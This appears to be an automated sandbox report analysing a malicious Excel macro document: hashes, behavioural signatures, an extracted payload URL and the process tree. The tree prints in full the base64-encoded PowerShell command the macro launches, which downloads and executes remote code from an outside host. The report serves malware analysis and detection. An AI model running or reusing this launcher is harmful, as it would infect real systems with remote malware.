Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-09-2024 18:49
Behavioral task
behavioral1
Sample
4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls
Resource
win10v2004-20240802-en
General
-
Target
4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls
-
Size
28KB
-
MD5
14399d9b212ebf920943652ba1e7f5e3
-
SHA1
2411de8a3f816645015e912bd92e5369c6e5b0c9
-
SHA256
4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7
-
SHA512
72f667df460361c44e51558fc09b035569bc570567ac732c25c5996f3e844170acf2d42439964993aeae04c41b7218226c5e989a7b9d78eacaf11b4a8b3f0c7b
-
SSDEEP
384:i8LD/TZxA6ymevz2NsdHLpeAokr25Uen/WWA/E:rD/N+6devz2NsdHLQkr25U6We
Malware Config
Extracted
https://oshi.at/LdxX
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2304 powershell.exe -
Office macro that triggers on suspicious action 1 IoCs
Office document macro which triggers in special circumstances - often malicious.
resource yara_rule behavioral1/files/0x0037000000015d48-18.dat office_macro_on_action -
Deletes itself 1 IoCs
pid Process 2468 EXCEL.EXE -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\5B567F00\:Zone.Identifier:$DATA EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2468 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2304 powershell.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2468 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2304 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2468 EXCEL.EXE 2468 EXCEL.EXE 2468 EXCEL.EXE 2468 EXCEL.EXE 2468 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2468 wrote to memory of 2304 2468 EXCEL.EXE 30 PID 2468 wrote to memory of 2304 2468 EXCEL.EXE 30 PID 2468 wrote to memory of 2304 2468 EXCEL.EXE 30 PID 2468 wrote to memory of 2304 2468 EXCEL.EXE 30
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls1⤵
- Deletes itself
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBvAHMAaABpAC4AYQB0AC8ATABkAHgAWAAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls
Filesize68KB
MD5ac5c767d425b1a1488df091b61684452
SHA1b186b13793f4f8dc15723a76bc2d9a8df5ad7fe7
SHA256264c56547fd5abd207c1c8822e7af8448c7b983a2c091cb382fa4351941072eb
SHA5128b78bfbe5fd5faec9698a19b52c4c9db19dee3aaa9148f03ab74094d1d394b8b9223cde79589bb9d90c7a7031609389f795c39f251e082ff2a44568f96b146ce